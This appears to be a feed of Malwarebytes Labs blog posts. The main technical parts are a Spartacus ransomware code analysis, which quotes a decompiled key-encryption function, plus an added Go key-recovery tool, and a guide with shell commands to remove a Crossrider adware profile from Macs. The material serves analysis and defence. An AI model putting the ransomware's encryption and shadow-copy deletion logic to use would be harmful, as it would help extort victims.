Money makes the world go round, and for SamSam their currency of choice is Bitcoin. Make no mistake, business is good; they’re estimated to have racked up around $850,000 in profit and they show no sign of slowing down. Consider that their estimated $850k profit is still nowhere near the cost of recovery for the City of Atlanta alone, and then take into account how much cleanup has cost for everyone else affected so far.

No matter your reason for being online, and regardless of which industry you operate in, I think we can all agree warding off an attack such as the ones above should be foremost in your mind when allocating a budget to security threats. SamSam isn’t going away anytime soon, and unfortunately the same can be said for other infections waiting to strike. It only takes one moment of inattentiveness, and you could be faced with some difficult decisions indeed.

Thanks to Marcelo for screenshots and additional information.

The post SamSam ransomware: what you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Spartacus ransomware: introduction to a strain of unsophisticated malware

Malwarebytes - Mon, 04/30/2018 - 17:40

Spartacus ransomware is a new sample that has been circulating in 2018. Written in C#, the original sample is obfuscated, which we will go over as we extract it to its readable state.

Spartacus is a relatively straightforward ransomware sample and uses some similar techniques and code to others we have seen in the past, such as ShiOne, Blackheart, and Satyr. However, there is no sure relationship between these samples and the actors. I mention it mainly to show that they share similar functionality and are basic in form.

In the case of Satyr and Blackheart, the code is nearly identical, with Spartacus following almost the same code flow with some modifications. If I were to make an assumption, I would say they are either the same actor or the actors for each of them used the same code. But again, there are no facts to prove this as of now.

In general, what we notice is that there is a string of these .NET ransomware popping up, all of them more or less the same or similar. It is just an easy form of ransomware that criminals are creating, as it obviously does not take much time or thought to make.

There is nothing impressive about them, in fact just the opposite. I would say they are boring at best. So why are we writing about one of them? The analysis of Spartacus can essentially be used as a base knowledge and reference for anyone analyzing variants of these basic .NET ransomware that they may come across in the future.

The two takeaways from this article will be understanding the code in detail, and understanding how to get an obfuscated .NET sample into a readable state.


Before we begin, I want to mention one characteristic about Spartacus’ encryption method. Spartacus starts by generating a unique key for encryption with the Rijndael algorithm. (Rijndael is the cipher that was standardized as AES.)

This key is saved and used to encrypt every single file, meaning that two identical files will have the same cipher-text. The AES key is encrypted with an RSA key embedded in the file. The cipher-text is encoded and shown to the user in the ransom note.

The fact that the RSA key is statically embedded in the ransomware implies that the private key exists on the server side of the ransomware author’s system. Thus, all AES keys from all victims of this particular strain can be decrypted using this one key if it is ever leaked.

As this ransomware is not extremely complex, we will go straight to the deep technical analysis and code walkthrough.


When we first open the sample of Spartacus in ILSpy, we see this:

The code of the functions is not visible and as you can see, everything is obfuscated. In these scenarios, I like to use a tool called de4dot. It will process the file and output a clean readable version. The -r flag is where you set the directory, which contains the obfuscated .NET sample.

This gives us the clean version, which we will be using for our analysis going forward.


Let’s begin with the Main function shown below.

It starts by making sure there is only one instance of this malware running on the system. It does so by the CheckRunProgram function, which, among other things, creates a mutex and makes sure it is unique.

After this check is complete, it executes smethod_3 in a thread.

Before the smethod_3 begins, the constructor for this class gets automatically called now and sets up all the private members (variables), which include all special folders to search and encrypt. It also generates the AES key, which is unique to the victim, using the KeyGenerator.GetUniqueKey(133) function. The special folders can be viewed below and will be referenced throughout the ransomware to begin folder traversing.

The keygen function, as I mentioned, is GetUniqueKey(), the details of which are below. Essentially, it just creates a series of cryptographically strong random numbers using the RNGCryptoServiceProvider.GetNonZeroBytes API function. It then uses that series of random numbers as indexes into the character set array = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890” to build a unique string of characters. This is the AES key, which will encrypt all files going forward.

Now that the constructor of the class has been initiated, let’s take a look at the smethod_3 function that was called.

This function iterates the list of special folders generated in the constructor and begins its recursive traversal, encrypting every file in the folders using the smethod_6 function. One thing I will note here is that the encryption loop does not discriminate between file types or special files. It will encrypt everything it comes across. Also, you can see smethod_1 being called. This may be a leftover mistake of the programmer, as its output is not used anywhere at this point; smethod_1 is called again later on, when it’s time to display the encrypted key to the user.

As I mentioned, the smethod_6 function is the one doing all the encryption, but the smethod_5 function is the recursive function that will dig into each sub folder of whatever location it starts at, calling smethod_6 on each iteration to encrypt the files in that sub folder.

As you can see, it calls itself so that it will eventually cover every single sub folder. Then it calls smethod_6 to do the actual encryption, looping through every file in that folder.

This method iterates all files in the current folder. The only stipulation is that the file is not already encrypted. This is the portion here, which simply makes sure the extension is not already .Spartacus:

if (Path.GetExtension(text) == ".Spartacus") { return; }

If this check passes, it calls smethod_7, which does the file content rewriting with the encrypted version.

The function calls smethod_0, which encrypts the original file data, and then the next two lines write the encrypted data into the file and rename it with the .Spartacus extension. A quick note: Another sign that every single file is encrypted with the same key is that this ransomware does not write the encrypted AES key into the file, which we see in other ransomware that perform unique file encryptions.

As you can see here, it uses the Rijndael method—AES using ECB mode. The key that was generated in the constructor is hashed with MD5, and that is actually what is used as the key itself.

Now we have gone through the whole process for file encryption on the main file system, through all the sub functions called inside of the parent function smethod_3.

Let’s go back to the main function now to the next line, which calls smethod_4():

smethod_4 basically performs exactly the same set of recursive function calls as we saw in smethod_3. However, rather than looping through special folders, it is now iterating over all logical drives that are attached to the system, so all external or mapped drives will be encrypted as well.

We do not need to go through all these details now, as we have already covered their functionality, since they are identical to the earlier function calls. The only thing I will mention is that smethod_6 is called twice. This is done most likely to speed up the encryption by having it run on two threads.

Back to main: the next and final important function call is:

Application.Run(new Form1());

This will display the ransom note to the user and show the encrypted AES key in the ransom note.

It starts by calling smethod_1(). As I mentioned above, this simply takes the AES key, which was generated at the beginning and encrypts it using the hard-coded public RSA key.

public static string smethod_1()
{
    return Convert.ToBase64String(Class1.smethod_2(
        "<RSAKeyValue><Modulus>xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>",
        Encoding.UTF8.GetBytes(Class2.smethod_0())));
}

The RSA key is hard coded and embedded into the ransomware, which means that the author has generated the private key in advance on his side.

It then iterates all drives and writes the ransom note there. Finally, it opens the ransom note displaying the message and the RSA-encrypted AES key, which will be used by the victim in order to decrypt.

After all of this, the final thing it does is call smethod_0, which deletes shadow volumes in order to prevent the user from using them as a Windows restore point.

This ransomware is purely offline in that there are no network communications back to the author or any C2 server. The ransomware author does not know who he has infected until they email him with their personal ID, which is the AES key. This also means that the decryption tool the author will send is likely embedded with the AES key, which unfortunately will be unique to the specific victim.

There is nothing special or innovative about this sample, but that does not mean it is not dangerous. It will still do its job—at the moment there is no decryptor for this. The only slight possibility to save yourself if you realize you are being hit with this malware is to perform a process memory dump, in which case there is a slight possibility of extracting the keys from memory.

In general, it is always a good idea to perform a memory dump of any malware on your system before killing the process in the slight chance that some keys can be recovered.
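As an added example (my own Go code, not from the Spartacus sample or from Malwarebytes), this ties together the key derivation described above and the memory-dump suggestion in the last two paragraphs: it scans a dump-like byte buffer for 133-character runs over the key alphabet, hashes each candidate with MD5 as the sample does, and validates it by decrypting the first AES-ECB block of an encrypted file against a known file signature. The memory dump and the encrypted file are constructed inline; that the key string is still present in process memory on a real system is an assumption.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/md5"
	"fmt"
	"strings"
)

// From the analysis above: 133 characters from this alphabet; AES-128 key = MD5(keyString).
const (
	keyCharset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
	keyLen     = 133
)

// pngMagic is the 8-byte PNG file signature, used here as the known-plaintext check.
var pngMagic = []byte("\x89PNG\r\n\x1a\n")

var sampleKey = strings.Repeat("Qz7", 44) + "a" // constructed 133-char demo key, not from a real infection

// deriveAESKey mirrors the step described above: MD5 of the ASCII key string.
func deriveAESKey(keyString string) []byte {
	sum := md5.Sum([]byte(keyString))
	return sum[:]
}

// ecbCrypt runs AES on each 16-byte block independently (ECB); data must be block-aligned.
func ecbCrypt(key, data []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(data)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("data length %d is not a multiple of %d", len(data), aes.BlockSize)
	}
	out := make([]byte, len(data))
	for i := 0; i < len(data); i += aes.BlockSize {
		if decrypt {
			block.Decrypt(out[i:], data[i:])
		} else {
			block.Encrypt(out[i:], data[i:])
		}
	}
	return out, nil
}

// candidateKeys returns every keyLen-character window inside maximal runs of alphabet
// characters. Long runs (base64 blobs, for instance) yield many windows, so validate each.
func candidateKeys(dump []byte) []string {
	var cands []string
	runStart := -1
	flush := func(end int) {
		for s := runStart; runStart >= 0 && s+keyLen <= end; s++ {
			cands = append(cands, string(dump[s:s+keyLen]))
		}
		runStart = -1
	}
	for i, b := range dump {
		if strings.IndexByte(keyCharset, b) < 0 {
			flush(i)
		} else if runStart < 0 {
			runStart = i
		}
	}
	flush(len(dump))
	return cands
}

// recoverKey decrypts only the first block with each candidate and accepts the one whose plaintext starts with magic.
func recoverKey(dump, encryptedFile, magic []byte) (string, bool) {
	if len(encryptedFile) < aes.BlockSize {
		return "", false
	}
	for _, cand := range candidateKeys(dump) {
		plain, err := ecbCrypt(deriveAESKey(cand), encryptedFile[:aes.BlockSize], true)
		if err == nil && bytes.HasPrefix(plain, magic) {
			return cand, true
		}
	}
	return "", false
}

// buildFixtures constructs a fake memory dump containing sampleKey and a fake encrypted PNG
// produced with the scheme described above. Both are constructed test data, not real artifacts.
func buildFixtures() (dump, encFile []byte) {
	plain := append(append([]byte{}, pngMagic...), bytes.Repeat([]byte{0}, 24)...) // 32 bytes
	encFile, _ = ecbCrypt(deriveAESKey(sampleKey), plain, false)
	dump = []byte("\x00\x00garbage\xff" + "AAAA" + "\x01" + sampleKey + "\x00more\x00")
	return dump, encFile
}

func main() {
	dump, encFile := buildFixtures()
	k, ok := recoverKey(dump, encFile, pngMagic)
	fmt.Println("recovered:", ok, k)
}
```

The same check works with any file type whose first 16 bytes are predictable (DOCX/ZIP, PDF, PE headers), which is how a real dump would be triaged.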

The post Spartacus ransomware: introduction to a strain of unsophisticated malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 23 – April 29)

Malwarebytes - Mon, 04/30/2018 - 15:17

Last week, we dug into behavioral biometrics, explored a new crossrider variant, and embraced the power of “no.” We also launched another CrackMe challenge, took a deep dive into smart toys, and finished up with a look at digital privacy in the age of IoT.

Other news

Stay safe, everyone!

The post A week in security (April 23 – April 29) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Please don’t buy this: smart toys

Malwarebytes - Fri, 04/27/2018 - 16:00

Smart toys attempt to offer what a lot of us imagined as kids—a toy that we can not only play with, but one that plays back. Many models offer voice recognition, facial expressions, hundreds of words and phrases, reaction to touch and impact, and even the ability to learn and retain new information. These features provide an obvious thrill for many children, whose imaginary friend just became a lot more real.

At the low end, smart toys can be as simple as a motion-activated rattle designed with features intended to help with developmental milestones. Higher-end toys can be as engaging as a real-life R2-D2 that will watch Star Wars with you and offer commentary.

But much like other Internet of Things products, smart toys don’t have a great track record of protecting personal information, designing software according to industry best practices, and updating in a timely manner. And we’re in fairly new territory when it comes to young children and the Internet. Suddenly, we have to worry about protecting the digital footprint of our kids before they’re even online as active participants. Not only that, we don’t yet know the repercussions of a person’s data being collected and transmitted online essentially from birth.

As cool as that R2-D2 is, we suggest for the time being that you please don’t buy smart toys.

Why not?

The problems start to creep in with the data collection necessary for a toy to be properly interactive. While simple games and preprogrammed phrases can run from on-board memory or over a Bluetooth connection to a computer, more complex speech recognition and “remembering” user preferences and conversations generally require sending input data to a remote server for analysis against a training data set.

This process can be completely benign if all points in the data transmission chain are configured and secured properly. Unfortunately, there is a lot of room in the collection chain for vulnerabilities to creep in.

At the point of collection, decisions need to be made to appropriately sanitize personal information. (Doubly important if the user is a child.) The collected data needs to be transmitted in a manner that’s secure against third-party eavesdroppers. And at the other end of the collection chain, all data needs to be stored on a secure server using patched, up-to-date software, and hashed with a modern, secure algorithm. Smart toy makers have not done well on any of these benchmarks in the past.

Setting privacy issues aside for a moment, software update lag is a common issue with any IoT device. A smart toy may be smart today, but new functionality and bug fixes might be rare or nonexistent to allow for new product releases. Security patches, in particular, vary wildly in frequency across IoT manufacturers. Of the manufacturers we reviewed, only Fisher Price disclosed anything specific about their updates and data collection practices, and no manufacturers provided any information about security features.

Lastly, security design of these products—in particular, their associated mobile apps—is generally not very good. Hong Kong maker VTech Electronics made the news in 2015 for what they described as a “sophisticated” SQL injection attack that resulted in exposure of personal information for millions of children. Breaches happen quite a bit, and the temptation is to dismiss it as something unavoidable. But an outstanding article by Troy Hunt took a look at their security practices and found:

  • No usage of SSL anywhere on their websites
  • Password hashing with a deprecated, easily-cracked algorithm
  • Storage of security questions in plain text
  • Extensive use of Flash

For those not in the know, these are basic, 101-level security design flaws that in total suggest irresponsibility by the company rather than a one-off event by a hyper-competent hacker. (Please read Troy’s followup article, which goes into greater detail on the impact of VTech’s poor design.)

Until companies can be held to a unified standard of foundational security practices, allowing them access to an underaged user in any way is ill-advised.

Maybe buy this instead

Beyond the security issues built into the product out of the box, adult users aren’t always helping the cause, ignoring updates or clicking through agreements without reading privacy notices in detail. Often simple computer hygiene, like changing the default password, could save a family from creepy hacks of their baby monitors and teddy bears.

Sitting down with your toddler and having a conversation about privacy and secure PII best practices probably won’t go well, either. Should your child not be amenable to an IoT ban, Fisher Price makes a series of smart toys that state clearly that no personal information is transmitted via WiFi. Clear, unequivocal statements like that are rare in the IoT space.

However, in 2016, a Fisher Price smart bear was found to be leaking customer and children’s data via an unsecured API. Industry security standards for most IoT products are so low that even the best in a particular class can still be a risk.

For the sake of the children

Smart toys take all of the risk of IoT products and apply them to children. Prior negligence by some companies, as well as the larger impact of security flaws when the user is a child, prompted the FBI to release an advisory on potential issues with smart toys. Until manufacturers operate under a shared security standard with meaningful enforcement, we advise that please, for the sake of the kids—don’t buy this.

The post Please don’t buy this: smart toys appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes CrackMe 2: try another challenge

Malwarebytes - Fri, 04/27/2018 - 15:00

Last November, we released the first edition of the Malwarebytes CrackMe. Encouraged by the positive response we received from the security community, we decided to repeat the game, hopefully making it even more interesting and entertaining.

As before, the CrackMe is dedicated to malware analysts and to those who want to practice becoming them. That’s why it is not just a set of some abstract riddles, but an exercise that walks through selected tricks that were used in real malware. (Expect some original schemes designed just for this game, too.)

Of course, all is demonstrated on harmless examples, but we still recommend you use a VM for reversing it so that it will not interfere with any antivirus protection.

Rules of the contest

There are two CrackMe contests:

  1. Capture the flag. The first three submitted flags win. The flag should be submitted along with (minimalistic) notes about the steps taken to find it. (No detailed write-up is required.)
  2. Best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show his/her method of solving the CrackMe, as well as their level of understanding of the techniques used. The write-up submission contest closes three weeks after capture the flag.

Submissions to both contests should be sent to my Twitter account: @hasherezade. Each of the four winners will get a prize: a book of his/her choice and some Malwarebytes swag.

At the end of the contest, I will publish my own solution, written from the author’s point of view. All the submitted write-ups will be linked.

UPDATE: We already have the winners in the “Capture the flag” category: 1) Hexacorn 2) florek_pl 3) FraMauronz. Congratulations! Now we are waiting for your write-ups!

Asking questions

I want the contest to be fair to everyone, so I will not be answering any questions in private. However, if you are stuck, please don’t hesitate to post your question in the comments section of this post, and I will answer as soon as possible. The questions can be also answered by other participants. Giving false clues or teasing beginners will result in a ban—please respect fair play.

The application

The application is a Windows executable. It was tested on Windows 7 and above.

You can download it here.

Have fun!

The post Malwarebytes CrackMe 2: try another challenge appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The Internet of Everything and digital privacy: what you need to know

Malwarebytes - Thu, 04/26/2018 - 15:36

If you don’t already own Internet of Things (IoT) devices, you likely will soon. IoT-enabled devices are physical gadgets with built-in Internet connectivity that allow data transmission; often this happens in the background with no indication to the user that anything is happening.

The IoT is more like the Internet of Everything—statistics indicate within the next couple of years, there will be three IoT devices for every adult and child on the planet.

So, should people be concerned about consumer privacy and data security if these gadgets are always on and ready to transmit information whether we realize it or not? Let’s take a look.

Rise of the IoT brings new security concerns

The functionality and capabilities of IoT devices bring about realities that haven’t been dealt with before. Many people know they can opt out of some data collection techniques used on websites. However, if they do that with most IoT devices, the decision typically impacts how the gadgets work and may render them useless.

There’s also the fact that the increase in connected devices causes a gigantic jump in the amount of data collected. Individuals understandably wonder which device manufacturers know details about them, where the data gets stored, and how those companies use the data.

As the number of IoT devices goes up, the number of infiltration points for potential hackers rises, too. There was a time when cybercriminals mostly targeted only the primary corporate data stores, but there have also been instances of hackers breaking into IoT devices themselves.

It’s essential for IoT companies to take all-encompassing data protection measures, including releasing security patches for known vulnerabilities.

Read: Internet of Things (IoT) security: what is and what should never be

Both consumers and companies must prepare

There are positive and negative factors associated with the Internet of Everything.

For example, companies can collect more data, which could make them prime targets for breaches. But, they can theoretically use that data to personalize user experiences, making them more relevant.

So what can companies do to both optimize their technology and protect user data? For one, they can be proactive about on-site cybersecurity strategies and data usage disclosures. By encrypting IoT device data while it’s at rest or in transit, businesses can take a substantial step toward improving user security. It’s also worthwhile for them to consult IoT security specialists to perform site audits or check for device vulnerabilities.

The European Union’s soon-to-be-enacted GDPR regulations do not provide clear-cut guidance for IoT devices in particular, but they emphasize obtaining user consent. Because it’s difficult to foresee all instances in which permission might be required, some recommendations suggest getting user consent during the setup process for an IoT device.

Consumers also need to research how to protect their devices and their data as much as possible. For example, limiting the permissions of an IoT device or periodically deleting the data Google and Amazon store about you is a good start. Signing up for the email list associated with an IoT device brand could also keep you in the loop about any known security flaws, letting you proactively download a patch as soon as it becomes available.

Researching privacy settings put in place by a specific IoT device is another smart step to take. For example, Fitbit offers detailed information on its website about privacy, data sharing, and how to tweak the respective settings on your Fitbit profile.

Third-party monitoring is essential

The recent news of Cambridge Analytica and its improper handling of Facebook user data highlighted the erosion of digital privacy taking place today, especially among third-party platforms. Most people knew Facebook had details about them but didn’t think about the potential of that information getting into the hands of a different company.

In the case of the Cambridge Analytica breach, people did not even have to download the app that grabbed their information. It was enough for a user in a person’s network to interact with the offending app, thereby triggering it to get data from all associated friends.

Facebook admitted it did not properly enforce rules set for how third-party companies handled the site’s data, so monitoring was seemingly non-existent.

Google also came under fire for a similar problem related to data mismanaged by third-party companies. Then, the issues stemmed from Android apps that tracked kids’ information.

It’s also crucial to think about what a lack of third-party monitoring could mean for people who use their IoT devices for payments. It’s already possible to buy a pizza or book a taxi with an Amazon smart speaker, and PayPal launched functionality in 2016 that allows for making payments instantly from any IoT device.

A survey about payment convenience polling more than 2,500 people found nearly two-thirds of them would pay through IoT devices to make transactions faster and easier. But, by doing so, would they be trading privacy for convenience?

Researching device-specific privacy information is often difficult enough. When third-party payment processors come into the picture, it’s harder still for people to get concrete answers about what happens to their data.

Government regulation

In the aftermath of these incidents, questions have arisen about whether it’s time for governmental regulation to come into play.

However, a poll shows only 41 percent of Americans believe Facebook would follow regulatory rules if they were set. Based on that result, putting regulations in place wouldn’t do much to boost consumer confidence, but it may have other benefits.

Research shows IoT bottlenecks often occur when data gets analyzed, aggregated, and communicated. Regulation could minimize those slowdowns and associated problems. For example, if the government provides sufficient bandwidth and opens up more of the electromagnetic spectrum for speedy wireless information transfers, communication slowdowns will become less prominent.

Experts point out that besides regulatory rules indicating what companies cannot do, they should set good examples of how to reduce risks to people who use IoT devices.

Lawmakers in the US have teamed up to put that ideal into action. They created a proposed framework that imposes minimum standards for IoT devices: For instance, they cannot have hard-coded passwords. If they contain known vulnerabilities, they must provide written explanations detailing why the gadgets are secure, despite those shortcomings.

Even if the proposed regulations do not become part of national law, the information within them steers IoT manufacturers in other countries in the right direction. They might not have previously considered some of the stipulations presented in the guidelines, but could potentially change their approaches to designing and securing IoT devices after reading them.

Awareness reduces consumer risk

Being aware of digital privacy begins when initially setting up IoT devices. Many consumers blindly click “I Agree” on any prompt they see, but they need to read agreements and understand what they mean before proceeding. The same applies when updating apps.

Also, when downloading an app, you’ll probably see a dialog box indicating which information the app pulls from your device. In some cases, you can limit the information received or shared.

Unfortunately, app permissions descriptions are often too brief and unclear. If you feel uneasy about likely approving a reduction in your digital privacy by agreeing to vague permissions, consider not downloading the app.

Keeping your devices updated is a smart first step because it gives you the latest security patches. Going further and being proactive by limiting shared data reduces the information hackers can potentially get.

Although it’s necessary for companies to keep user data privacy in mind, consumers cannot assume there is no need for them to take further action.

When you use IoT-enabled devices, it’s crucial to realize how a feature that seems convenient at first may sacrifice privacy, making it warrant scrutiny.

Kayla Matthews is a tech journalist covering AI, the IoT, smart gadgets and cybersecurity. In addition to being a senior writer for MakeUseOf, Kayla is a regular contributor at Digital Trends, The Next Web, VentureBeat and TechnoBuffalo. Read more from Kayla at

The post The Internet of Everything and digital privacy: what you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Far Cry 5 download offers: embrace the power of “no”

Malwarebytes - Wed, 04/25/2018 - 16:18

The recently released Far Cry 5 is a video game where you reclaim Montana from a cult obsessed with the “power of yes” by hitting members over the head with a shovel. It’s also one of the biggest sellers for publisher Ubisoft to date, and it stands to reason that many people would like to grab a copy for free.

It’s been a while since we saw a wave of YouTube vids promising free games all based around one title, but this is definitely one of those moments given the huge popularity of its shovel-throwing hero.

In the past week or so, we’ve seen videos galore, all offering downloads or sign ups or sign ups and downloads (novel!), with a couple of heart-warming flashbacks to our somewhat off-the-boil friend, the survey scam (and a couple of download sites, too). The standard operating procedure for these kinds of scams means they’re reliant on here today, gone tomorrow videos so the view count typically varies between half a dozen and thousands upon thousands. Not all of them get taken down, so it’s possible to drive huge numbers to the final destination.

Here’s a typical example:

Click to enlarge

Nothing says old school like “poorly typing out instructions in Notepad while giving you a tour of my desktop.” That one leads to a site called oceanofgames(dot)com, which itself offers up a variety of download links:

Clicking the blue button takes you to solvettube(dot)com, which serves up a similar number of links/adverts, and offers up a roughly 40GB download after hitting the page. The download kept failing for us so we can’t tell you what it is, but caveat emptor (with the additional caveat in your caveat by pointing out you’re not actually buying anything here).

Next up, we have someone filming their TV screen for what looks like a promo for a console version. The site being promoted here is fc5(dot)gamereach(dot)net, and we’ll come back to that one later.

Click to enlarge

The next video is pretty ugly looking, and features hideous gigantic text over a web browser. Having said that, people likely to fall for these things probably couldn’t care less what the video looks like.

Click to enlarge

The other videos knocking around all follow the same pattern; crudely thrown together video, lots of text to ensure it gets picked up in searches, and the suggestion that you should get over there quick before the offer expires.

First, we’ll check out fr5(dot)yourunlocker(dot)org, which is your standard survey unlocker website.

Click to enlarge

Select your platform, hit the verify button, and:

Lots of surveys to choose from. Here’s one site we ended up on—a sign up for something to do with “unlimited movies.”

Click to enlarge

One of the other websites is a lot slicker and involves a fair bit of hoop jumping to get anywhere (and by “anywhere” I mean “a survey page”). It’s the one located at fc5(dot)gamereach(dot)net that we mentioned earlier.

It’s presented as some sort of pretend post-crowdfunding campaign page by someone claiming to be a team of game developers. The implication is, I guess, that they worked on Far Cry 5. It’s a bit of an odd line to take because it certainly wasn’t crowdfunded.

Click to enlarge

Thanks to you we were able to reach our goals! And with this little project we’ll lessen the strain on your wallets! One free game at a time! Dev. Andrey

From the FAQ page:

How are you able to give out a great game like this for free?

…if you followed our crowdfunding campaign, you should know that we got way past our set goal, and with the additional support and money, we were able to create a game which far exceeded our expectations, and we even have money left to spare, and with those, we decided to release this small project as an additional token of appreciation to all our supporters

Apparently, a game with a development budget of between $80 to $130 million dollars is a “small project” these days.

This one is all about submitting your email address and an “access code.” They claim you had to have contributed to their indie campaign to get your hands on one, but it doesn’t matter—the code is posted underneath the “console promo” YouTube video near the start of this blog.

Click to enlarge

Enter your access code

Enter your email

Select your platform

Then they perform some checks. No, really:

Click to enlarge

After this, there are messages about them needing to confirm you’re a human and not a bot (flimsy justification for popping survey questions the world over), followed by survey-style options leading to mobile-centric offers.

Click to enlarge

Click to enlarge

The other sites currently floating around act in much the same way; time-sensitive offer, not a bot verification, and lots of offers, downloads, and surveys to wade through before a total lack of free video game action. There’s no end to them. Here’s a screenshot filtered to just the last few hours of uploads:

Click to enlarge

Claims of DRM free downloads, or dubious cracks, are also rife. More often than not, downloading a supposedly unofficial copy of the game will just lead to headaches, especially where dabbling with game cracks is concerned. Malware is probably going to pay you a visit at some point, and then you’ll definitely need something more technical than a throwable shovel to solve the problem.

As much as you may wish to take down the evil cult plaguing Montana, the more sensible course of action is to wait until a game sale pops up.

Forget the power of yes; it’s time to embrace the power of no, and steer clear of download offers.

The post Far Cry 5 download offers: embrace the power of “no” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Crossrider variant installs configuration profiles on Macs

Malwarebytes - Tue, 04/24/2018 - 16:30

A new variant of the Crossrider adware has been spotted that is infecting Macs in a unique way. For the most part, this variant is still quite ordinary, doing some of the same old things that we’ve been seeing for years in Mac adware. However, the use of a configuration profile introduces a unique new method for maintaining persistence.

Persistence is the goal of most malware. After all, what good is it to infect a machine if the malware stops running as soon as the computer restarts? There are some cases where that can still be useful (ransomware, for example), but in most cases, that’s not desired behavior. So malware creators are often stuck using the same old methods of persistence that are easy to spot. Sometimes, though, they get creative.

Infection method

This new Crossrider variant doesn’t look like much on the surface. It’s yet another fake Adobe Flash Player installer, looking like the thousands of others we’ve seen over the years.

Opening the installer results in a familiar install process, with nothing unique about it. In the course of installation, it dumps a copy of Advanced Mac Cleaner, which commences to announce that it has found problems with your system using Siri’s voice. (No such problems actually exist, of course.) Safari also pops open and then closes again suspiciously. This is all very blasé, as far as malware goes.

But something interesting has happened behind the scenes. After removing Advanced Mac Cleaner, and removing all the various components of Crossrider that have been littered around the system, there’s still a problem. Safari’s homepage setting is still locked to a Crossrider-related domain, and cannot be changed.

Malicious configuration profile

It turns out that this is caused by a configuration profile installed on the system by the adware. Configuration profiles provide a means for IT admins in businesses to control the behavior of their Macs. These profiles can configure a Mac to do many different things, some of which are not otherwise possible.

In the case of this Crossrider variant, the configuration profile that is installed forces both Safari and Chrome to always open to a page on chumsearch[dot]com. This also prevents the user from changing that behavior in the browser’s settings.

The profile can be found by opening System Preferences, then clicking the Profiles icon. (If there isn’t a Profiles icon, you don’t have any profiles installed, which is normal.)

This profile installs with an identifier of com.myshopcoupon.www, which is not visible in System Preferences. However, the profile can definitely be identified by scrolling through the details and looking for references to chumsearch[dot]com. This malicious profile can be removed by selecting it and clicking the minus (-) button in the bottom left corner of the window.

If you’re an IT admin

For those readers who are managing fleets of Macs and need to check for and/or remove these profiles remotely, that’s pretty easy using a few simple shell scripts.
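Here is the whole check-and-remove sequence from this section wrapped in one script that picks the right `profiles` syntax for the macOS version it runs on. This is an added example, not a script from the original post. It assumes that `profiles -L` and `profiles list` print one line per installed profile containing `attribute: profileIdentifier: <identifier>` (an assumption about the output format), and that your management tool runs it as root, so no `sudo` is used:

```sh
#!/bin/sh
# Added example (not from the original post): check a Mac for the Crossrider
# configuration profile and remove it, picking the `profiles` syntax by OS version.
# Assumption: `profiles -L` / `profiles list` print one line per profile containing
# "attribute: profileIdentifier: <identifier>". Run as root (e.g. from your MDM agent).

BAD_ID="com.myshopcoupon.www"

# macOS 10.13 introduced the verb syntax (`profiles list`, `profiles remove`);
# 10.12 and earlier use the flag syntax (`profiles -L`, `profiles -R -p`).
uses_verb_syntax() {
    ver=$(sw_vers -productVersion)        # e.g. 10.12.6, 10.13.4, 11.2
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    [ "$major" -gt 10 ] || [ "$minor" -ge 13 ]
}

# Print the identifier of every installed profile, one per line
# (reads the output of the listing command on stdin).
list_identifiers() {
    sed -n 's/.*attribute: profileIdentifier: *//p' | sort -u
}

# Exit 0 if the profile listing on stdin contains the malicious identifier.
has_bad_profile() {
    list_identifiers | grep -qx "$BAD_ID"
}

# Run the listing command that matches this OS.
installed_profiles() {
    if uses_verb_syntax; then profiles list; else profiles -L; fi
}

# Remove the malicious profile with the syntax that matches this OS.
remove_bad_profile() {
    if uses_verb_syntax; then
        profiles remove -identifier "$BAD_ID"
    else
        profiles -R -p "$BAD_ID"
    fi
}

main() {
    if installed_profiles | has_bad_profile; then
        echo "Crossrider profile $BAD_ID found, removing"
        remove_bad_profile
    else
        echo "No Crossrider profile installed"
    fi
}

# Only act when invoked as `sh crossrider-profile.sh --run`, so the functions
# can also be sourced and exercised on their own.
case "${1:-}" in --run) main ;; esac
```

The identifier check is separated from the command that produces the listing so the same logic can be run against saved `profiles` output collected from many machines before anything is removed.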

On macOS 10.12 and earlier, you can use a command like this:

sudo profiles -L

This works on macOS 10.13 as well, but there is an updated syntax that would be best to use in the future:

sudo profiles list

Either way, if you see an unfamiliar profile, particularly one with a profileIdentifier of com.myshopcoupon.www, that profile should be removed. This can be done with the following command on macOS 10.12 and earlier:

sudo profiles -R -p com.myshopcoupon.www

Or, for macOS 10.13:

sudo profiles remove -identifier com.myshopcoupon.www

Gone in a Flash

The good news is that there was nothing particularly sneaky about the method of infection. Fake Adobe Flash Player installers are nothing new, and are easy to avoid. Still, people do continue to fall for such scams.

If you see a message in your web browser telling you that Adobe Flash Player needs to be updated, it’s almost certainly a scam. Do not follow any of the directions provided by these messages, and especially don’t download and install whatever they tell you to.

If you do have Flash installed on your Mac, and you believe that it needs an update, you can check for and install updates from the Update tab in the Flash Player pane in System Preferences.

If you want to install Flash for the first time on your Mac, the first thing you should do is think twice. Flash is a dying technology, and is a constant source of security vulnerabilities. Few sites these days truly require Flash. However, if you really do insist on installing it, you should download it only from Adobe’s website.

